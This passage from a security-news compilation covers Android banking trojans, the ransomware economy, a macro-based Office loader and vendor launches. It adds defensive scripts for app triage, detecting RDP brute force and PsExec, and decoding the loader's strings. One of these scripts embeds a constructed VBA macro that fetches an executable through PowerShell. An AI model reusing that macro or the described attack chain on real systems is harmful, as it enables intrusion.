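     "permissions": [OVERLAY, USAGE_STATS, RECEIVE_SMS]},
    {"package": "com.example.flashlight", "label": "Flashlight", "installer": None,
     "permissions": []},
]

if __name__ == "__main__":
    for hit in triage(INVENTORY):
        print(hit["package"], hit["score"], "; ".join(hit["reasons"]))
```

Only the sideloaded "Super Mario Run" lookalike crosses the threshold; the store-installed messenger that legitimately holds the overlay and SMS permissions scores 3 and stays below it, which is why installer provenance carries weight in the heuristic rather than permissions alone.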

The "solid organization" behind the Marcher Trojan makes the threat very dangerous; experts consider it as effective as other notorious banking malware such as Sinowal/Torpig, Dyre, Dridex, and Gozi.

“Based on the statistics we found on this one C2 panel we researched and the amount of different C2 panels out there, we believe that the potential financial losses due to Android banking Trojans are, or will soon be, bigger than the current losses from desktop malware like Gozi and Dridex, especially since hardly any of the banking apps seem to detect the attack,” concluded the experts.


A look into the Russian-speaking ransomware ecosystem
14.2.2017 Kaspersky Virus

It is no secret that encryption ransomware is one of the key malware problems today, for both consumers and corporate users. While analyzing the attack statistics for 2016, we discovered that by the end of the year a regular user was attacked with encryption ransomware on average every 10 seconds, with an organization somewhere in the world hit around every 40 seconds.

 

Kaspersky Lab statistics on the ransomware threat in 2016

In total we’ve registered attacks using encryption ransomware against 1,445,434 users worldwide. Between them, these people were attacked by 54 thousand modifications of 60+ families of crypto ransomware.

So why is this happening now if encryption ransomware, as a type of malware, has existed since the mid-2000s? There are three main reasons:

It’s easy to buy a ransomware build or builder on the underground market
It’s easy to buy a distribution service
Crypto ransomware, as a business, has a very clear monetization model through cryptocurrencies
In other words, this is a fine-tuned, user-friendly and constantly developing ecosystem. In the last few years we, at Kaspersky Lab, have been monitoring the development of this ecosystem. This is what we've learned.

1. In most cases crypto ransomware has a Russian origin

One of the findings of our research is that 47 of the 60+ crypto ransomware families we’ve discovered in the last 12 months are related to Russian-speaking groups or individuals. This conclusion is based on our observation of underground forums, command and control infrastructure, and other artefacts which can be found on the web. It is hard to draw strong conclusions on why so many of the ransomware families out there have a Russian origin, but it is safe to say that this is because there are a lot of well-educated and skilled code writers in Russia and its neighboring countries.

Another possible reason is that the Russian cybercriminal underground has the richest background when it comes to ransomware schemes. Prior to the current crypto ransomware wave, there was another ransomware-themed malware epidemic. Between approximately 2009 and 2011, thousands of users in Russia and its neighboring countries experienced attacks which used so-called Windows- or browser-lockers. This type of ransomware blocks the user’s access to their browser or OS and then demands a ransom in exchange for unlocking access. The epidemic withered for a number of reasons: law enforcement agencies responded adequately and caught several criminals involved in the business; mobile operators made the process of withdrawing money through premium SMS services harder; and the security industry invested a lot of resources into developing free unlocking services and technologies.

But it seems that experienced ransomware criminals haven’t disappeared, they’ve just been waiting for a new monetization model, which has now emerged in the form of crypto currencies. This time though, the ransomware problem is not specifically Russian, but global.

2. There are three types of involvement in the ransomware “business”

The Russian underground crypto ransomware market currently offers criminals three different ways of entering the illegal business.

Create new ransomware for sale
Become a partner in a ransomware affiliate program
Become the owner of an affiliate program
The first type of involvement requires advanced code writing skills, including a deep knowledge of cryptography. The actors which we have observed in this category are like gun traders: they usually don’t participate in actual attacks, but only sell code.

 

An example of an advertisement selling unique crypto malware, posted by its creator. The author promises encryption with Blowfish and RSA-2048 algorithms, anti-emulation techniques, advanced scanning capabilities, and functions allowing for the removal of backups and shadow copies of the information stored on the victim’s PC.

Sometimes, authors of the malware sell their “products” with all the source code for a fixed price (usually several thousand dollars) and sometimes they sell their builder – the tool which allows criminals with no programming background to build the crypto ransomware with a specific list of functions.

The following illustration provides hints as to what capabilities a builder gives to a criminal. For example, it allows criminals to create ransomware which will start encrypting files only after 10 minutes of user inactivity; which will change the extensions of encrypted files to one of the criminals' choice; and which will request administrator privileges until it receives them. It also allows criminals to change desktop wallpapers to arbitrary ones, and to implement some other features that in the end can be combined into a very dangerous piece of software.

 

The interface of the Glove ransomware builder

Builders are usually much cheaper than the full source code of unique ransomware – hundreds of dollars. However, authors (and owners) of software like this often charge customers for each new build of malware created with help of their software.

Pay-per-build is another type of monetization used by the authors of the original ransomware. In this case the price drops even lower, to tens of dollars, but the client would receive the malware with a fixed list of functions.

 

An advertisement offering unique crypto ransomware with a pay-per-build model

The build often includes not only the malware code itself, but also tools for statistics and interaction with infected PCs.

 

An example of a command and control panel which comes with the build of a certain ransomware family

Affiliate programs, the third type of involvement in the ransomware criminal business, are a rather standard form of cybercrime: owners of the program provide partners with all the necessary infection tools, and then the partners work on distributing the malware. The more successful their efforts, the more money they receive. Participation in such programs requires nothing but the will to conduct certain illegal activities and a couple of bitcoins as a partnership fee.

 

An advertisement for an affiliate program

Interestingly, while researching the development of the underground ransomware ecosystem, we discovered two types of affiliate programs: one for all, and one for specific partners.

Unlike the programs for everyone, “elite” programs won’t accept just any kind of partner. In order to become a partner in an elite program, a candidate has to provide a personal recommendation from one of the acting partners in the program. Besides that, the candidate must prove that they have certain malware distribution capabilities. In one case we observed in the last year, the candidate had to demonstrate their ability to complete at least 4000 successful downloads and installations of the malware on victim PCs. In exchange, the partner gets some free tools for the obfuscation of ransomware builds (in order to make them less visible to security solutions) and a good conversion rate – up to 3%, which is a very good deal, at least compared to rates that legal affiliate programs offer.

To summarize all that is written above: flexibility is the key feature of the current underground ransomware ecosystem. It offers lots of opportunities to people with a propensity towards criminal behavior, and it almost doesn’t matter what level of IT experience they have.

3. There are some really big players on this market

If you think that being the owner or a partner of an “elite” affiliate program is the highest possible career milestone in the world of ransomware, you are mistaken. In reality, ransomware creators, their stand-alone clients, partners and owners of affiliate programs are often working for a bigger criminal enterprise.

 

The structure of a professional ransomware group contains the malware writer (aka the creator of the group), affiliate program owners, partners of the program, and the manager who connects them all into one invisible enterprise

There are currently several relatively large ransomware groups with Russian-speaking participants out there. In the last few months we’ve been researching the operation of one such group and now have an understanding of how it operates. We consider this group an interesting one, because it is built in a way that made it really hard for us to identify all its affiliates. It consists of the following parties: The creator, the manager, the partners, and affiliate programs. According to our intelligence the creator and the leader of this group is the ransomware author. He developed the original ransomware, additional modules for it and the IT infrastructure to support the malware operation. The main task of the manager is to search for new partners and support existing ones. According to our knowledge, the manager is the only person who interacts with the creator. The primary task of partners is to pick up the new version of ransomware and distribute it successfully. This means successfully infecting as many PCs as possible and demanding a ransom. For this – among other tools – partners utilize the affiliate programs which they own. The creator earns money by selling exclusive malware and updates to the partners, and all the other participants of the scheme share the income from the victims in different proportions. According to our intelligence, there are at least 30 partners in this group.

4. Costs and profits on the underground ransomware market are high

We estimate that the revenue of a group like the one described above could reach as much as thousands of dollars a day in successfully demanded ransom payments. Although, of course, as with any other type of malicious activity at a professional level, the professional ransomware player spends a lot on resources in order to create, distribute and monetize the malicious code.

The structure of the operating cost of a large ransomware group more or less looks like the following:

Ransomware modules update
New features
Bypass techniques
Encryption improvement
Distribution (spam/exploit kits)
AV check service
Credentials for hacked servers
Salary for hired professionals (usually these are IT administrators who support the server infrastructure)
The core of the whole group’s mechanics is ransomware code and the distribution channels.

They distribute ransomware in four main ways: exploit kits, spam campaigns, social engineering, hacked dedicated servers, and targeted hacks. Exploit kits are one of the most expensive types of distribution tool and could cost several thousand dollars per week, but, on the other hand, this type of distribution is one of the most effective in terms of the percentage of successful installations.

Spam emailing is the second most popular form of distribution. Spear phishing emails sent by criminals are usually disguised as an important message from a government organization or large bank, with a malicious attachment. According to what we’ve observed in the last year, spamming targets with malicious emails is a more than workable method, because in 2016 the amount of ransomware-related malicious spam blocked by our systems was enormous.

And sometimes the emails that the targets of ransomware hackers receive are technically legit. While working on incident response we’ve observed several instances where an email with a malicious attachment (which in the end encrypted important victim data) was sent out from a legitimate email, by a legitimate user. Very often, these are emails from clients or partners of an attacked organization, and after digging deeper and talking to representatives of the organization which sent the malicious emails, we learned that that organization was infected as well.

 

How criminals use one infected organization to attack another

It appeared to us that the ransomware criminals initially infected one organization, then got access to its email system and started sending out emails with a malicious attachment to the whole company's contact list. It is hard to overstate the danger of this form of ransomware distribution: even if the recipient of an email like this is aware of the main methods cybercriminals use to distribute malware, there is no way for him or her to identify the attack.

As we've learned, the operating costs that ransomware criminals face to support their campaigns may amount to tens of thousands of dollars in some cases. Even so, this business is unfortunately extremely profitable. Based on what we've seen in conversations on underground forums, criminals are lining their pockets with nearly 60% of the revenue received as a result of their activities. So, let's go back to our estimate of the daily revenue of a group, which may be tens of thousands of dollars on a good day.

 

The typical distribution of profit (green) vs. operating costs (red) in a ransomware business

That's of course an estimate of cumulative net income: the total sum of money which is used as payoffs to all the participants of the malicious scheme – starting from regular affiliate program members and ending with the elite partners, manager and the creator. Still, this is a huge amount of money. According to our observations, an elite partner generally earns 40-50 bitcoins per month. In one case we've seen clues that an especially lucky partner earned around 85 bitcoins in one month, which, according to the current bitcoin exchange rate, equals $85,000.

5. Professional ransomware groups are shifting to targeted attacks

An extremely worrying trend which we are observing right now is that ransomware groups with large budgets are shifting from attacking regular users and, occasionally, small companies, towards targeted attacks against relatively large organizations. In one of our incident response cases we have seen a targeted attack against a company with more than 200 workstations, and in another case one had more than 1000.

The mechanics of these new attacks are very different to what we’ve been used to seeing.

For initial infection they have not used exploit packs, or spear phishing spam. Instead, if they were able to find a server belonging to the targeted company, they tried to hack it
To get into the organization’s network, this group used open source exploits and tools
If the organization had an unprotected server with RDP access this group tried to use brute force against it
To get the necessary access rights to install ransomware in the network with psexec, they used the Mimikatz tool
Then they could establish persistence using an open source RAT tool called PUPY
Once they had gained a foothold in the attacked network, they studied it, chose the most important files and encrypted them with a custom, previously unseen build of ransomware
Another group which we found in another large organization did not use any ransomware at all. They encrypted data manually: they chose important files on a server and moved them into a password-protected archive.
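Two of the steps listed above leave well-known traces in Windows event logs: a brute-force attempt against an exposed RDP server produces a burst of failed logons from one source, and remote execution with psexec registers a service on the target. The following script is an added example (not Kaspersky Lab code) of detection logic for those two steps run over constructed event records. The event IDs, logon type and service name are the real Windows values; the hosts, addresses, accounts and timestamps are constructed sample data, and the Mimikatz and PUPY steps are not covered.

```python
"""Detection logic for two of the targeted-attack steps described above, run over
constructed Windows event records: RDP password brute forcing (a burst of failed
logons followed by a successful remote-interactive logon from the same source) and
lateral movement with PsExec (installation of the PSEXESVC service). Added example,
not Kaspersky Lab code; all event records below are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta


def _failed_rdp_logons(src, start, count, users):
    """Build `count` constructed 4625 (failed logon) records from one source, 7 s apart."""
    return [
        {"time": (start + timedelta(seconds=7 * i)).isoformat(), "id": 4625,
         "src": src, "user": users[i % len(users)], "logon_type": 10}
        for i in range(count)
    ]


# Event IDs follow the real Windows logs: Security 4625 = failed logon, 4624 =
# successful logon (LogonType 10 = RemoteInteractive, i.e. RDP); System 7045 = a
# new service was installed. Hosts, IPs and accounts are constructed sample data.
EVENTS = (
    _failed_rdp_logons("203.0.113.7", datetime(2017, 2, 10, 2, 0, 1), 30,
                       ["administrator", "admin", "backup"])
    + [
        # the password guessing eventually succeeds on the "backup" account
        {"time": "2017-02-10T02:05:30", "id": 4624, "src": "203.0.113.7",
         "user": "backup", "logon_type": 10},
        # PsExec run against a file server: its service is dropped and registered
        {"time": "2017-02-10T02:30:00", "id": 7045, "host": "FILESRV01",
         "service": "PSEXESVC", "image": r"%SystemRoot%\PSEXESVC.exe"},
    ]
    # normal admin activity: two typos, then a successful RDP logon
    + _failed_rdp_logons("10.0.0.5", datetime(2017, 2, 10, 9, 9, 40), 2, ["alice"])
    + [{"time": "2017-02-10T09:10:00", "id": 4624, "src": "10.0.0.5",
        "user": "alice", "logon_type": 10}]
)


def detect_rdp_bruteforce(events, threshold=10, window=timedelta(minutes=10)):
    """Alert when a source accumulates >= `threshold` failed RDP logons inside
    `window` and then logs on successfully: the signature of a password attack
    that worked, which is what makes it worth paging on."""
    failures = defaultdict(list)
    alerts = []
    for ev in sorted(events, key=lambda e: datetime.fromisoformat(e["time"])):
        if ev.get("logon_type") != 10:
            continue
        when = datetime.fromisoformat(ev["time"])
        src = ev["src"]
        if ev["id"] == 4625:
            failures[src].append(when)
        elif ev["id"] == 4624:
            recent = [t for t in failures[src] if when - t <= window]
            if len(recent) >= threshold:
                alerts.append({"src": src, "failures": len(recent),
                               "account": ev["user"], "time": ev["time"]})
    return alerts


def detect_psexec_service(events):
    """PsExec registers a service named PSEXESVC on the target; a 7045 record
    naming it is a high-fidelity indicator unless PsExec is sanctioned on that host."""
    return [ev for ev in events
            if ev["id"] == 7045 and ev.get("service", "").upper() == "PSEXESVC"]


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce(EVENTS):
        print("RDP brute force succeeded:", alert)
    for ev in detect_psexec_service(EVENTS):
        print("PsExec service installed on", ev["host"], "at", ev["time"])
```

The brute-force rule deliberately fires only on the successful logon, so a noisy scanner that never gets in is logged but does not page anyone, while the two mistyped passwords from the internal admin stay far below the threshold. The PSEXESVC check is exact-match on the service name; renamed PsExec copies would need the image path or the service binary hash as well.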

Conclusion

In both cases described above the actors demonstrated a modus operandi that is characteristic of targeted attack actors – while we’re almost 100% sure that the groups behind these attacks are the ones that previously worked mostly on widespread ransomware campaigns. There are two main reasons why we think ransomware actors are starting to implement targeted methods in their operations.

1. Thanks to multiple successful massive campaigns they’re now funded well enough to invest big money in sophisticated operations.

2. A ransomware attack against a large corporation makes total sense, because it is possible to paralyze the work of a whole company, resulting in huge losses. Due to this, it is possible to demand a ransom larger than the one requested from home users and small companies.

We have already seen a mutation of this kind with another dangerous type of malicious activity: the financial cyberattack. These also started as massive attacks against the users of online banking. But as time passed, the actors behind these campaigns shifted their interests, firstly to small and medium companies, and then to large corporations, the banks themselves.

It is also important to note that so far the ransomware business has been considered a safe one by criminals. This is due to their certainty that the use of crypto currencies allows them to avoid being tracked by the “follow the money” principle, as well as the lack of arrests of gangs involved in ransomware. From our perspective all these conclusions are wrong. We hope that law enforcement agencies will soon start paying more attention to these groups.

Sun Tzu said: If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained, you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.

This article has two main purposes: to educate people interested in fighting ransomware and to raise awareness of the problem which targeted attacks with the use of ransomware can bring.

Although well-publicized prosecution cases against ransomware actors are yet to take place, people and companies can act now to make the job of ransomware actors harder and protect their data. First of all, make regular backups and store them on a drive that is air-gapped from your organization’s main network.

Don’t forget to protect your servers with proven security solutions. They identify and block the most recent versions of ransomware strains.

And the main advice – DO NOT PAY! If you pay the ransom, your money will be pumped into the malicious ecosystem, which is already flooded with funds. The more money criminals get, the more sophisticated tools they get access to, giving them access to much broader attack opportunities.


ThreatConnect Launches New Threat Intelligence Products

14.2.2017 securityweek Security

Threat intelligence firm ThreatConnect announced this week the launch of a new suite of products designed to help organizations understand adversaries, automate their security operations, and accelerate threat mitigation.

The new products, built on the ThreatConnect Platform, have been named TC Complete, TC Analyze, TC Manage and TC Identify.

TC Complete, the company’s flagship product, is a security operations and analytics platform that aims to enable companies to efficiently run their security operation center (SOC) by giving them the ability to orchestrate security processes, analyze data, respond to threats, and report progress from a single location. TC Complete incorporates the features and benefits of all the other ThreatConnect products.

Another new product is TC Identify, which provides vetted threat intelligence collected from over 100 open source feeds, ThreatConnect communities, the company's research team and, optionally, intelligence from members of the TC Exchange program.

TC Manage is an intelligence-driven orchestration tool that enables organizations to automate threat data management processes, including notifying team members when manual tasks need to be performed, or sending indicators to defensive tools for blocking or alerting.

The last new product is the TC Analyze threat intelligence platform, which provides a central location for analyzing data and integrating with existing security tools. The platform allows analysts to better understand which threats are relevant, gain visibility into attack patterns, and share threat intelligence with executives and other stakeholders.

ThreatConnect products

“By introducing our new innovative suite of products, we are able to address all levels of need in the marketplace. With these four specific products, ThreatConnect allows any organization with any size security team the option to extend its capabilities,” said ThreatConnect VP of Product Andy Pendergast. “We conducted substantial research into organizations’ current and potential intelligence needs to protect their environment and came up with these specific products to reach them where they are now and where they need to be in the future.”


Office Loader leverages malicious macros to deliver multiple malware
14.2.2017 securityaffairs Virus

Security researchers at Palo Alto Networks have spotted a campaign that uses a Microsoft Office loader relying on malicious macros to drop multiple malware families.
The researchers have analyzed more than 650 unique samples of this loader since early December 2016, accounting for some 12,000 phishing emails targeting numerous industries.

Most affected industries are High Tech, Professional and Legal Services, and Government.

office loader

The Office loader is delivered via spam messages and employs heavily obfuscated malicious macros and a user account control (UAC) bypass technique to infect the target.

“The loader itself is primarily delivered via email and makes use of heavily obfuscated malicious macros as well as a user account control (UAC) bypass technique that was originally discovered in August 2016.” reads the analysis published by Palo Alto Networks.

The phishing messages carried malicious documents masquerading as invoices, product lists, deposit slips, document scans and more.

The Office loader was used to drop several malware such as LuminosityLink, KeyBase, PredatorPain, Ancalog, Bartalex, Pony, and DarkComet.

“Based on the large amount of commodity malware families being dropped, as well as the wide distribution seen, this loader appears to primarily be used for widespread campaigns.” continues the analysis.

According to the experts, the threat actor behind the campaign may have used a builder to generate the malicious macros, which are obfuscated with a large amount of garbage code and randomly chosen variable names. The second part of the macro also includes obfuscated strings and a number of strings that are written to the Word document.

The first half of the macro includes a function to decode the obfuscated strings.

“In the second half of the macro, we see a garbage code, a number of obfuscated strings, as well as a number of strings that are written to the Word document. These strings are in-line with the ploy being used by the attacker based on the witnessed subject line and filename.” reads the analysis.

“This function will download a file via PowerShell and drop it within the %TEMP% directory. It then sets a specific registry key to point to this newly dropped file. Finally, it will execute the built-in eventvwr.exe process, sleep for roughly 15 seconds by performing a ping against the localhost 15 times, and removes the dropped file. The registry key write and execution of eventvwr.exe is a UAC bypass technique that was first discussed here.”

The experts noticed that a small number of samples used the built-in BITSAdmin tool instead of PowerShell to download the malware.

“Overall, this new loader is interesting in its use of performing a UAC bypass. Additionally, the widespread use of this loader since December of last year shows that it is being used in numerous campaigns.” concluded Palo Alto Networks. “It is unclear if this loader is being used by one or more groups. Multiple industries have been targeted by this loader, which has been used to deploy multiple malware families.”


IaaS Creating New Variant of Shadow IT

13.2.2017 securityweek Crime
Custom Applications are being Increasingly Used from Within Public Clouds as Part of the Migration to IaaS

Organizations cannot rely on commercial off-the-shelf (COTS) software to fulfil all their IT requirements: almost all companies develop their own custom apps. The majority of these apps, whether internal or internet-facing, currently run on datacenters owned or operated locally. By the end of 2017 this will change -- the majority of enterprise custom apps will reside in public clouds as the industry-wide migration to Infrastructure as a Service (IaaS) increases speed.

A new report, conceived and developed by the Cloud Security Alliance and Skyhigh Networks, polled 314 qualified respondents in December 2016 and January 2017. The results (PDF) show that an increasing number of custom apps are being moved into cloud infrastructures (primarily AWS, Azure and Google Cloud Platform) without the security team necessarily being aware that they exist. This is effectively a new variant of Shadow IT -- it is not necessarily software unknown to the IT department, but it is software unknown to the head of security.

This presents a new security and compliance challenge since CISOs cannot secure what they cannot see. It is possible that the app developers assume that their apps are protected by the cloud providers' security, and therefore don't need to be sanctioned by in-house security. Certainly, the majority of respondents believe that IaaS is more secure than local data centers simply because of the huge security resources available to Amazon, Microsoft and Google.

But clouds operate a form of shared responsibility under which the customer is responsible for the data it uploads and the apps it develops. The report cites the example of Code Spaces, which provided a code repository for its customers on AWS. It was breached. AWS was not compromised, but rather the attackers got hold of a legitimate Code Spaces account password. Ultimately, they destroyed all the customers' data, and the effect on Code Spaces was so severe that it went out of business.

What the Skyhigh survey highlights is that more and more custom apps are being used from within public clouds as part of the migration to IaaS.

"The security of custom applications has not been a focus in many organizations," explains Nigel Hawthorn, Skyhigh's chief European spokesperson, "but every company is now a software company; 92 percent of them write their own custom apps, and the average enterprise will have more than 500 apps running in the next year. Moreover, 72% of companies have a bespoke critical app running today that is essential to operations. When these workloads are targeted by a cyberattack or fall victim to a mistake, the downtime will cost a business dearly. It's no surprise that application innovation is ahead of security but, with an average of 285 custom apps running that are unknown to IT security teams, companies must ensure that IT security is part of the custom app development process."

The actual number of apps unknown to security varies with the size of the organization. Small companies, with fewer than 1,000 employees, can have as few as 22 custom apps; but large companies with more than 50,000 employees can have an average of 788 apps. It is the invisibility of such a large number of them that causes the security concern. Sixty-five percent of respondents said they are moderately or very concerned for the security of custom apps in the cloud, with only 13.8% 'not at all concerned'.

"IT security professionals," says the report, "are only aware of 38.4% of the applications known to IT administrators. This means that IT security teams are involved in fewer than half of these applications to ensure corporate data is protected against threats. Rather than security being a barrier to development, it appears development is occurring without involvement from security."

The biggest single concern (from 66.5% of respondents) is that unprotected apps could be used to upload sensitive data to the cloud. This is followed at 56% by a third-party account compromise similar to the one suffered by Code Spaces. But 40.1% are also concerned about sensitive data being downloaded from the cloud to an unmanaged BYOD device.

Loss of personal data could be expensive under data protection regulations and damaging to brand reputation; but some of the custom apps are actually critical to business operations. Almost 73% of the respondents said they have at least one business-critical application. Forty-six percent of these are either fully deployed in the public cloud or in a hybrid public/private cloud -- and IT security professionals have incomplete visibility into their deployment and operations. As the migration to IaaS continues, the number of business-critical custom apps at risk will undoubtedly increase.

"Securing sensitive data in the cloud is no longer the remit of one party, it's a shared responsibility," says Hawthorn. "The rapid adoption of IaaS deployments sees the role split between infrastructure providers and enterprises, while internally, businesses cannot expect IT to manage cloud security alone. There needs to be buy-in from all departments to ensure custom applications have cybersecurity imbedded from the start, and that employees continue to use them in ways that won't put corporate data at risk."

Last week, Skyhigh Networks SVP of products and marketing, Kamal Shah, announced in a blog post, "Skyhigh will pioneer this next phase of the cloud security market with Skyhigh for Custom Apps and Skyhigh for Amazon Web Services, Microsoft Azure, and Google Cloud Platform."


RSA Unveils Business-Driven Security Offering

13.2.2017 securityweek Security
RSA, which since September is part of Dell Technologies, on Monday unveiled a new approach and product improvements designed to help organizations manage cyber risk.

With its new Business-Driven Security architecture, RSA aims to provide organizations the tools needed to link security information to business context and protect the most sensitive assets.

The RSA Business-Driven Security solutions focus on threat detection and response, consumer fraud protection, identity and access assurance, and business risk management.

This includes the RSA NetWitness Suite, which provides visibility and actionable insight for detecting advanced threats and understanding the full scope of an incident. The new capabilities added to the product enable organizations to monitor any infrastructure by collecting data from public clouds (e.g. AWS, Microsoft Azure), virtual environments, and physical infrastructure.

The launch of Business-Driven Security also brings improvements to RSA SecurID Access. RSA says the multi-factor authentication and access management product now offers a better way for delivering strong security to users, devices and applications.

The latest release of the RSA Fraud & Risk Intelligence Suite brings a centralized platform designed to improve fraud detection and investigation. The new platform should enable organizations to better protect their customers against cyberattacks by allowing them to obtain additional insights, including from internal and external sources, and other anti-fraud tools.

The offering also includes the RSA Archer Ignition Program, which helps organizations manage business risk through a combination of Governance Risk and Compliance (GRC) use cases, quick launch services and education offerings.

Finally, the Business-Driven Security architecture is operationalized via the new RSA Risk & Cybersecurity Practice. The practice aims to reduce business risk through risk management, identity assurance, incident response, and advanced cyber defense.

“Despite best efforts, today’s security approaches are in dire need of transformation because they fall short when they are put into action. This forces organizations into a downward cycle of investment and re-investment,” said Rohit Ghai, President, RSA. “RSA is proud to provide a new architecture and array of Business-Driven Security solutions that are engineered to enable the most critical elements of a sound security strategy: linking business context with security incidents to more strategically address and manage business risk to protect what matters most.”


National Cyber Security Centre – UK hit by dozens of major cyber attacks each month
13.2.2017 securityaffairs Cyber

Britain’s security has been threatened by 188 major cyber attacks in the last three months, according to the head of the National Cyber Security Centre.
According to the head of the National Cyber Security Centre (NCSC), the UK government suffered at least 188 major cyber attacks in the past three months.

Ciaran Martin, former GCHQ cybersecurity chief, told The Sunday Times that the attacks are mostly from China and Russia.

The attacks threatened national security: nation-state actors conducted cyber espionage campaigns to “extract information on UK government policy on anything from energy to diplomacy to information on a particular sector.”

“Britain is being hit by 60 significant cyber-attacks a month, including attempts by Russian state-sponsored hackers to steal defence and foreign policy secrets from government departments, the new cyber-security chief has revealed.” reported The Sunday Times.

“In his first key interview, Ciaran Martin, head of GCHQ’s new National Cyber Security Centre (NCSC), warned there had been a “step change” in Russia’s online aggression against the West as well as more attacks on “soft targets” such as local councils and charities to steal personal data, and universities to steal research secrets.”

National Cyber Security Centre

Martin confirmed that the UK suffered state-sponsored attacks similar to those that targeted the Democratic National Committee in the 2016 Presidential Election.

UK authorities highlighted “a step-change in Russian aggression in cyber space” across the years.

“Part of that step change has been a series of attacks on political institutions, political parties, parliamentary organizations and that’s all very well evidenced by our international partners and widely accepted,” he said.

The National Cyber Security Centre had blocked 34,550 “potential attacks” on UK entities over the past six months.

“Meanwhile, Chancellor Phillip Hammond – a former defence and foreign secretary – said the NCSC had blocked 34,550 “potential attacks” on government departments and members of the public in the last six months – a rate of about 200 a day.” reported the BBC.


Office Loader Uses Macros to Drop Array of Malware

13.2.2017 securityweek Virus
A recently discovered Microsoft Office loader uses malicious macros to drop multiple malware families, Palo Alto Networks security researchers warn.

More than 650 unique samples of this loader have been observed since initial detection in early December 2016, accounting for 12,000 malicious sessions targeting numerous industries. The loader, researchers say, is being delivered via email and employs heavily obfuscated malicious macros and a user account control (UAC) bypass technique to compromise targeted systems.

The roughly 12,000 phishing emails distributing the loader used a variety of subject lines, claiming to be purchase orders, requests for quotation, purchase enquiries, and email verification notifications, among others. The attached malicious documents were masquerading as invoices, product lists, deposit slips, or document scans, and more.

High Tech, Professional and Legal Services, and Government were some of the most affected industries, Palo Alto Networks says. However, the distribution campaigns leveraging this loader have been targeting other sectors as well, including Wholesale, Telecoms, and Services.

Some of the malware families dropped using this loader included LuminosityLink, KeyBase, PredatorPain, Ancalog, Bartalex, Pony, and DarkComet.

“Based on the large amount of commodity malware families being dropped, as well as the wide distribution seen, this loader appears to primarily be used for widespread campaigns,” the security researchers say.

The loader uses malicious macros that have been obfuscated using a large amount of garbage code and randomly chosen variables, which led researchers to believe that a builder was used to generate them. The second part of the malicious macro, researchers say, includes not only garbage code, but also obfuscated strings and a number of strings written to the Word document and which are in-line with the ploy used by the attacker, based on the subject line and filename.

The first half of the macro, on the other hand, includes a function to decode the obfuscated strings; the decoded strings are then used in a PowerShell command. To decode a string, the macro simply removes every character that is present in a blacklist string. Researchers also note that only about half of the samples contained decoy information.

One of the decoded functions was meant to download a payload via PowerShell and then drop it within the %TEMP% directory. The macro would also create a registry key to point to the dropped file, while also abusing Windows Event Viewer to bypass UAC and elevate its privileges. The dropped file is then removed.
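The decoding step described above (strip every character that appears in a blacklist string) is simple enough that an analyst can automate it instead of stepping through the macro by hand. The following Python script is an added example for the loader covered in this article and in the securityaffairs write-up above; it is not Palo Alto Networks' code. The macro text it parses is constructed for illustration: the function and variable names, the blacklist characters, the URL (192.0.2.10 is a documentation address) and the file name are assumptions, not indicators from the campaign. Only the decoding technique follows the article.

```python
"""Pull the blacklist-obfuscated strings out of a macro and decode them.

Added example for the loader described above; this is not Palo Alto
Networks' code. SAMPLE_MACRO is a CONSTRUCTED stand-in: the function and
variable names, the blacklist characters, the URL (192.0.2.10 is a
documentation address) and the file name are assumptions. Only the
decoding technique, dropping every character that appears in a
blacklist string, follows the article.
"""
import re

SAMPLE_MACRO = r'''
Private Function qzxv(zrte As String) As String
    Dim kjh As String, i As Long
    kjh = "!#%"
    ' keep only the characters that are NOT in the blacklist
    For i = 1 To Len(zrte)
        If InStr(kjh, Mid(zrte, i, 1)) = 0 Then qzxv = qzxv & Mid(zrte, i, 1)
    Next i
End Function

Sub AutoOpen()
    Dim u As String, p As String
    u = qzxv("h!t#t%p!:#/%/!1#9%2!.#0%.!2#.%1!0#/%b!i#l%l!.#e%x!e#")
    p = qzxv("p!o#w%e!r#s%h!e#l%l! #-%w! #h%i!d#d%e!n# %-!c#")
    Shell p & " iwr " & u & " -OutFile $env:TEMP\bill.exe"
End Sub
'''

# Substrings that make a decoded string worth an analyst's attention.
SUSPICIOUS = ("powershell", "bitsadmin", "http://", "https://", "eventvwr", "temp")


def find_blacklist(macro: str) -> str:
    """Locate the decode loop, InStr(<blacklist>, Mid(...)) = 0, and return
    the string literal assigned to its blacklist variable."""
    loop = re.search(r'InStr\((\w+),\s*Mid\(', macro)
    if not loop:
        raise ValueError("no InStr/Mid decode loop found")
    var = loop.group(1)
    assign = re.search(rf'\b{var}\s*=\s*"([^"]*)"', macro)
    if not assign:
        raise ValueError(f"no string literal assigned to {var}")
    return assign.group(1)


def find_decoder_name(macro: str) -> str:
    """Return the name of the function whose body contains the decode loop."""
    for fn in re.finditer(r'Function\s+(\w+)\s*\(.*?End Function', macro, re.S):
        if re.search(r'InStr\(\w+,\s*Mid\(', fn.group(0)):
            return fn.group(1)
    raise ValueError("no decode function found")


def deobfuscate(blob: str, blacklist: str) -> str:
    """The decoder itself: drop every character that occurs in the blacklist."""
    return "".join(ch for ch in blob if ch not in blacklist)


def decoded_strings(macro: str) -> list:
    """Decode every literal passed to the decode function, in source order."""
    blacklist = find_blacklist(macro)
    name = find_decoder_name(macro)
    blobs = re.findall(rf'\b{name}\("([^"]*)"\)', macro)
    return [deobfuscate(b, blacklist) for b in blobs]


def triage(macro: str) -> dict:
    """Decode the macro's strings and flag the ones an analyst should look at."""
    decoded = decoded_strings(macro)
    flagged = [s for s in decoded if any(k in s.lower() for k in SUSPICIOUS)]
    return {"blacklist": find_blacklist(macro), "decoded": decoded, "flagged": flagged}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_MACRO).items():
        print(f"{key}: {value}")
```

Run it against the VBA text exported with olevba or a similar tool; the regexes assume the InStr/Mid loop shape shown, so a builder that changes the loop will need the two patterns adjusted, but the decoder function itself is the whole technique.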

The UAC bypass was first detailed in August 2016, and was recently used in various campaigns, including some focused on the distribution of ransomware.

A small set of samples used the built-in BITSAdmin tool instead of PowerShell to download the malware. The technique was associated with 11 samples that were spotted in early December, when the loader first appeared. However, the attackers switched to PowerShell.

“Overall, this new loader is interesting in its use of performing a UAC bypass. Additionally, the widespread use of this loader since December of last year shows that it is being used in numerous campaigns. It is unclear if this loader is being used by one or more groups. Multiple industries have been targeted by this loader, which has been used to deploy multiple malware families,” Palo Alto researchers conclude.
